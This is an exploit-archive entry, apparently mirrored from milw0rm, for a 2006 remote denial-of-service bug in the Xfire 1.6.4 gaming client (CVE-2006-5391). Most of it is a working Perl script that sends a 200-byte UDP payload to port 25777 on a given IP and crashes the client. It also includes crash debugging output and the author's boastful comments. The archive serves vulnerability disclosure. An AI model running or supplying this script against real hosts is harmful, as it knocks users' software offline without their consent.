Xfire 1.6.4 - Remote Denial of Service



EKU-ID: 10575 CVE: OSVDB-33655;CVE-2006-5391 OSVDB-ID:
Author: n00b Published: 2006-10-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/perl
#Moderator of http://igniteds.net
##############################################################################
#X fire version:new Release 1.64 <12th, 2006>
##############################################################################
#Vendors web site http://www.xfire.com/
#remote exploit coded by: n00b..
#Credit's to n00b for finding this bug..
#Xfire client has a dos exploit closing the client upon
#success full exploitation xfire will fail..Ive provided the following
#Proof of concept for the exploit..This exploit happens when a malicious
#packet is sent to the client on port udp port 25777 this will throw an exception
#causing xfire to terminate.Tested on win xp service pack 1 + 2.
#this is an example of the error on success full exploitation on the client side.
#################################################################################
#
#          Error microsoft visual c++ runtime library
#
#          program: c:\program files\xfire\xfire.exe
#
#          r6025
#                  - pure virtual function call.
#################################################################################
#Debugging info available at crash time.
#
# eax=77c280e4 ebx=00000000 ecx=77c112b0 edx=77c61a70 esi=7c90e88e edi=000000ff
# eip=7c90eb94 esp=0012f5dc ebp=0012f6d8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
# ntdll!KiFastSystemCallRet:
# 7c90eb94 c3              ret
#################################################################################
#the following is the proof of concept available..

print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th, 2006> \n";

use IO::Socket;

$ip = $ARGV[0];

$payload = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
           "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";


if(!$ip)
{

die "remember the ip\n";

}

$port = '25777';

$protocol = 'udp';


$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Make sure service is running on the port\n";


print $socket $payload;

close($socket);

print "client has died h00ha \n";

# milw0rm.com [2006-10-16]